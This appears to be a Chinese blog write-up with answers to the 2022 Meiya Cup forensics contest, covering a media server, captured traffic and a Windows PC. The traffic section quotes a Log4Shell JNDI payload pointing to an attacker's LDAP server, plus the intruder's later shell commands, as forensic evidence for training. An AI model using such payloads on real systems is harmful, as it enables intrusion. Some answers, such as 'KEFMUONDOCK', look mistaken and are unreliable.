2022年美亚杯(团体赛AGC部分)

文章目录

前言

搜查人员于现场捡取一部服务器、一部员工 (Carson) 所用的桌面计算机及一 部流媒体服务器。 AGC 集团 IT 部門 人员称建立服务器的同事已离职,他只是 负责以浏览器登入服务器操作,对系统并不熟悉。 他只知道服务器所用的操作 系统为 “Proxmox”,上面运作一个虚拟计算器。 虚拟计算机运作公司的电邮系 统“Xeams”。现场专家在初步分析后表示“Proxmox”服务器透过三个硬盘以软 RAID 建立而成, 现场虽未能撷取服务器逻辑存储(Logical Storage)内容,但他认为先撷取逻辑存 储内容作检验较好; 桌面计算机相信被黑客入侵,分析流量纪录相信黑客取走了 服务器部份档案。

题目

流媒体服务器分析

2.[填空题] 就AGC集团网络的流媒体服务器 (Media Server),有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)

使用lastlog命令查看各个用户登录情况
lastlog命令列出了各个用户的登录情况,如果没有登录过,则显示Never logged in,如果有登录历史,则显示出ip及登录时间。

sudo lastlog
user             pts/1    192.168.182.139  四 721 10:25:36 +0800 2022
sshd                                       **Never logged in**
sammy            pts/1    192.168.182.1    五 722 14:22:40 +0800 2022
mysql                                      **Never logged in**
mediauser        pts/0    192.168.182.1    二 719 15:04:39 +0800 2022

本地用户登录成功的有:reboot、mediause、sammy

答案:3

3.就AGC集团网络的流媒体服务器,有多少个本地用户曾经成功用 ‘ssh’ (Secure Shell)登录过? (以阿拉伯数字回答) (2分)

通过使用

last
lastlog

对比得出只有reboot、mediause、sammy三个用户的成功登录记录

答案:3

4.[填空题]就上述的本地用户,成功通过 ‘ssh’ 登录过该流媒体服务器多少次? (以阿拉伯数字回答) (3分)

火眼取证分析工具
路径:Liunx基本信息——>分区——>登录日志——>登录成功

进行登录ip筛选排序可以得到有12次

答案:12

5.[单选题]试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 ‘ssh:notty’ 登录该流媒体服务器? (2分)

A. iamhacker
B. hacking
C. hack
D. hacker
E. 以上皆非

在/var/log/btmp中可以查看到登陆失败的记录(可通过lastb命令进行检查)
直接打开备份日志中可以看到有两个用户:sammy、hack

答案:C

6.[填空题]就该流媒体服务器的本地用户, 有一个用户名是 ‘S’ 开头的, 该用户的姓氏是什么? (以大写英文回答) (3分)

硬着头皮从数据库上一个个找
解析数据库,首先在配置文件中找到数据库登录用户和密码

/** Database username */
define( 'DB_USER', 'wordpress' );
/** Database password */
define( 'DB_PASSWORD', 'user' );

解析数据库

mysql -uwordpress -puser
show databases;
use wordpress;
show tables;
select * from wp_usermeta;

可以看到
nickname sammy
first_name sammy
last_name Li

答案:Li

7.[多选题]该流媒体服务器是有使用Docker容器 (Docker Container) 的,当中包含以下哪个Docker镜像 (Docker Image) ? (3分)

A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非

可以直接通过取证软件查看
或者通过命令
docker images

答案:BCDE

8.[单选题]就上述的Docker镜像,哪一个镜像在系统上运行中? (2分)

A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非

命令
docker ps

答案:D

9.[多选题]该流媒体服务器是使用 ‘WordPress’ 建站 (Create Website) 的,就 ‘比特币’ 标题,有以下的电子邮箱地址曾经留有评论? (2分)

A. cn.wordpress.org
B. root58462@mail.qq.com
C. hi456@163.com
D. root@163.com
E. user1@localhost.net
F. 以上皆非

一般做法:
解析数据库,首先在配置文件中找到数据库登录用户和密码

/** Database username */
define( 'DB_USER', 'wordpress' );
/** Database password */
define( 'DB_PASSWORD', 'user' );

登录数据后操作一手

mysql -uwordpress -puser
show databases;
use wordpress;
show tables;
select * from wp_comments;

答案:BC

10.[单选题]该流媒体服务器里其中一个本地用户是有使用 ‘calendar’ 日历工具的, 日历内曾经提及以下哪个网站? (3分)

A. https://weibo.com
B. http://www.baidu.com
C. https://www.douyin.com
D. https://youku.com
E. https://www.binance.com
F. 以上皆非

直接打开

答案:E

11.[单选题]该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)

A. RAID 0
B. RAIDz2
C. RAIDz3
D. RAID 10
E. RAID 5
F. 以上皆非

调查报告中显示raid级别为mirror

答案:F

12.[单选题]该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份? (2分)

A. Jun
B. Jul
C. Aug
D. Sep
E. Oct
F. 以上皆非

我使用火眼仿真系统,仿真的时候将所有镜像都选择上,排序为acbde,根据调查报告来走。
使用命令Open /media0/mediastorage
文件名为迷住了幼迷住.mp4

答案:D

13.[填空题]承上题,拥有该段儿童色情影片的用户名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答) (1分)

ll并不是linux下一个基本的命令,它实际上是ls -l的一个别名。

ll -grep | 迷住了

答案:ROOT

14.[填空题]就AGC集团网络的流媒体服务器,曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果,该用户所输入的网址是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 https://web3.com,需回答 HTTPSWEB3COM)

待定

15.[填空题]该基本镜像存储池 (pool) 有一个快照 (Snapshot),快照的名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 media/mediapool@abc123,需回答MEDIAMEDIAPOOLABC123) (1分)

zpool list
查看池健康状态和空间使用情况

可以使用 -t 选项指定要显示的数据集的类型

类型说明
filesystem文件系统和克隆
volume
snapshot快照

使用命令zfs list -t snapshot

答案:MEDIA0MEDIASTORAGEVERSION1

16. [填空题]就上述所找到的基本镜像存储池快照 (Snapshot),它储存了多少个档案? (以阿拉伯数字回答) (1分)

使用命令zfs rollback media0/mediastorage@version1回滚镜像,查看文件数量

答案:24

流量分析

21. [单选题]分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 ‘GET’ 指令,它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)

A. http://155.137.195.111:8080
B. http://www.w3.org/2003/05/soap-envelope
C. http://61.238.217.108:8000
D. 以上皆非

寻找到61.238.217.108向AGC服务器10.0.66.184发送的流量,右键追踪TCP流
可以得到

答案:A

22.[单选题] IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 ‘POST’ 指令,它在 ‘HTML Form’ 项目的 ‘uname’ 栏所输入的字符串是什么? (1分)

A. root
B. ${jndi:ldap://61.238.217.108:1389/a}
C. application/x-www-form-urlencoded
D. password

过滤流量,右键追踪TCP流
得到:uname=%24%7Bjndi%3Aldap%3A%2F%2F61.238.217.108%3A1389%2Fa%7D&password=password

答案:B

23. [单选题]AGC服务器10.0.66.184收到IP地址61.238.217.108的 ‘POST’ 指令后,它执行了哪些行动? (2分)

A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口
B. 于IP地址61.238.217.108下载了Exploit.class
C. 使用端口49264连接IP地址61.238.217.108发送同步要求
D. 以上皆是

根据11流,在查找下一流也就是12流是,可以确定46858向1389发送了请求
文件中导出对象选择HTTP流可以确定有下载Exploit.class
在14流中可以确定使用了49264端口接收9001端口发送的报文

答案:D

24. [填空题]在上述行动后,IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)

查看流14

答案:9001

25. [多选题]AGC服务器10.0.66.184里有一个AGC目录 (Directory),它的子目录 (Sub Directory) 包含以下哪一个? (2分)

A. Accounting
B. Picture
C. Staff
D. Sambashare
E. Retail

追踪到14流,可以发现登录之后进行命令执行

ls
AGC
cd AGC
ls
Accounting
Personnel
Retail
Share
Staff
cd Staf

答案:ACE

26. [多选题]入侵者迸入AGC服务器10.0.66.184后,他成功执行以下哪些指令? (2分)

A. 檢视了readme.txt内容
B. 删除了三个档案
C. 删除了一个目录 (Directory)
D. 替档案改名
E. 建立了两个txt档案

分析14流

答案:DE

27. [单选题]入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename),这个档案的原来名称是什么?(1分)

A. cGhvdG9zT0Zyb2NreQ==
B. Finanical.xls
C. readme.txt
D. anonymous

追踪流就可以看到了

ls
cGhvdG9zT0Zyb2NreQ==
mv cGhvdG9zT0Zyb2NreQ== readme.pdf

答案:A

28. [单选题]承上题,该档案原档的建立日期是什么? (2分)

A. 2022-10-21 08:10:30 (UTC+0)
B. 2022-10-21 16:19:39 (UTC+0)
C. 2022-10-22 08:10:30 (UTC+0)
D. 2022-10-22 14:22:06 (UTC+0)
E. 2022-10-22 16:19:39(UTC+0)

在windows在文件导出对象中将上述文件导出,但是文件日期就自动修改了
所以我用foremost分离出pdf文件
查看文件属性

Fri 21 Oct 2022 09:19:39 AM PDT

答案:B

29. [单选题]承上题,该档案的SHA-256哈希值是什么?

A. a6eef1... ...27364c
B. 54785c… ...fe86f0
C. 961f2b… ...647d55
D. a00e6c… ...d0eaab
E. 以上皆非

将文件从流量包中导出,然后使用工具校验

答案:B

Windows计算机

31. [单选题]分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ,它的实際安装时间是什么? (以时区UTC+8回答) (3分)

A. 2022-09-26 14:35:17
B. 2022-09-26 21:35:17
C. 2022-09-27 05:35:17
D. 2022-10-05 03:52:15
E. 2022-10-05 11:52:15
2022-10-05 03:52:15

也可以仿真之后用systeminfo命令查看初始安装时间

答案:D

32. [单选题]AGC-CS计算机里的 ‘Acrobat DC’ 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (1分)

A. 2022-09-28 19:01:40
B. 2022-09-28 07:18:33
C. 2022-08-30 19:01:40
D. 2022-08-30 07:18:33

答案:A

33. [单选题]AGC-CS计算机里的用户 ‘Carson’ 链接了一个网络磁盘机 (Network Drive),在下列哪一个档案有相关资料? (2分)

A. \Users\Carson\NTUSER.DAT
B. \Users\admin\NTUSER.DAT
C. \Windows\System32\config\SYSTEM
D. \Windows\System32\config\SOFTWARE
E. \Windows\System32\config\SECURITY

网络磁盘采用\ip的方式进行访问,查看资源管理器的记录
存在一个share(分享),192.168.182.134ip下的,跳转源文件就可以了

答案:A

34. [单选题]承上题,用户 ‘Carson’ 连接的网络磁盘机的IP地址是什么? (1分)

A. \\192.168.182.134\
B. \\192.168.182.134\photo
C. \\192.168.182.134\share
D. \\192.168.182.134\AGC
E. \\192.168.182.134\AGC photo

根据33题就可以看到

答案:C

35. [填空题]分析计算机里的电邮数据,当中包含嫌疑人王景浩可能的居住地址,请回答他住址的楼层 (以阿拉伯数字回答) (1分)

查看邮件解析
信用卡號碼如上,送貨地址:香港灣仔港灣道28號灣景中心A座45樓C室
請問幾時送貨

答案:45

36. [填空题]承上题,王景浩使用的信用卡号码最后四位数字是? (1分)

查看邮件解析的数据
或者通过仿真在最近打开项目中可以看到银行卡
银行卡号为:5395910070166717

答案:6717

37. [填空题]AGC-CS计算机用户 ‘Carson’ 曾经收到一个电邮并通过里面的链结下载了一个可疑的 ‘Word’ 文件,那个档案的档案名是什么? (不要输入 ‘.’,以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (1分)

对邮件进行分析查看

Carson,你們的做生意手法很有問題,沒有貨但不能退訂......真的很想去消委會投訴你們公司,
算吧,如果這沒有貨,你給我看看這KEFmuon 有沒有貨,型號、規格詳情附載於連結中,請看看
https://docs.google.com/document/d/1qK5AQleyHjWYK8UWlrKRXlIiPXT-HDu-/edit
?usp=sharing&ouid=107263767302169929109&rtpof=true&sd=trueOn Sep 27, 2022, at 

可以得到一个链接。链接可以确定他是谷歌下载的
在路径/users/carson/downloads/下可以找到个名为KEFmuon.docx

答案:KEFMUONDOCK

38. [单选题]承上题,分析该 ‘Word’ 文件,它的可能用途是? (3分)

A. 访问一个网站
B. 记录键盘操作
C. 把档案加密
D. 改变桌面壁纸
E. 关闭计算机

将文件导出来
平台分析:https://www.threatbook.cn/product/sandbox
腾讯:https://habo.qq.com/

答案:A

39. [单选题]AGC-CS计算机里有一个名为 ‘admin’ 的用户,它是在何时被建立的? (以时区UTC+8回答) (1分)

A. 2022-09-28
B. 2022-09-29
C. 2022-09-30
D. 2022-10-01
E. 以上皆非

根据账户登录信息、更改密码日期、系统安全日志记录

答案:B

40. [填空题]黑客第一次采用用户 ‘admin’ 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)

根据/Users/admin/AppData/Roaming/TeamViewer/Connections.txt

答案:20220930171526

41. [填空题]黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件,这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)

黑客最早在29号入侵,因此看这之后的下载记录,只有一个putty

答案:PUTTY

42. [填空题]承上题,黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 (‘Media Access Control’ Address - MAC Address) 并存到一个名为 ‘ip.txt’ 的档案。当中 ‘192.168.182.130’ 计算机的MAC地址是什么? (不要输入 ‘:’ 或 ‘-’ ,以大写英文及阿拉伯数字回答) (3分)

这份文件被传输到王景浩的苹果电脑
在王景浩的电脑找到打开
可以定位到

答案:9061AEC09045

43. [填空题]AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 ‘admin’ 曾经采用记事本 (Notepad) 打开了一个文字档案,这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)

答案:待定

44. [单选题]黑客除了通过 ‘RDP’ 外,还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)

A. VNC
B. Teamviewer
C. Anydesk
D. Splashtop Business Access
E. RemotePC

答案:B

  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值